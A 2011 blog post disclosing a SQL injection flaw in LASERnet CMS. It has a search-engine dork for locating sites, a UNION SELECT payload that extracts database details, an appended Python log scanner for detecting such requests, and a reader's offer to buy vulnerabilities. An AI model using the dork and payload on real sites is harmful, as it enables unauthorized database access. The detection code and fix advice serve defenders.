Monday, August 8, 2011

LASERnet CMS Vulnerable to SQL Injection

Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://cms.lasernet.gr/index.php?lang=en
Dork : intext:"Powered by Lasernet"
Category: WebApps


http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+


thanks,
-p0pc0rn-
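
For defenders, a log check for the `id` parameter issue reported above, as an added example that is not part of the original post: it scans web access logs for `index.php` requests whose `id` value is not a plain integer and marks the UNION-based pattern separately. The Apache-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Aug/2011:10:00:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [08/Aug/2011:10:00:07 +0000] "GET /index.php?id=-1'%20UNION%20SELECT%201,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5--+ HTTP/1.1" 200 4876
203.0.113.9 - - [08/Aug/2011:10:00:09 +0000] "GET /index.php?lang=en HTTP/1.1" 200 5001
203.0.113.7 - - [08/Aug/2011:10:00:12 +0000] "GET /index.php?id=7%27 HTTP/1.1" 500 312
"""

# Client IP, request target and status code from an Apache-style log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# UNION ... SELECT in any case, with anything (spaces, comments) in between.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

def classify_id(value):
    """Return None for a plain integer id, otherwise a short verdict string."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_SELECT.search(value):
        return "union-select"
    return "non-integer-id"

def scan(log_text):
    """Return (ip, status, verdict, decoded id) for each suspicious index.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict:
                findings.append((ip, status, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response to a `union-select` hit deserves a closer look than a 500, since it suggests the query ran; the lasting fix is to cast `id` to an integer or bind it as a query parameter in the application.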



1 comment:

john said...

Hey. Great find, seriously man. It's easy to find web app bugs but this is quite a discovery.

If you are interested in getting paid for your vulnerability research (as in, we pay $x for SQL injection, XSS, and remote code execution), please send me an e-mail: john.martinelli@redlevel.org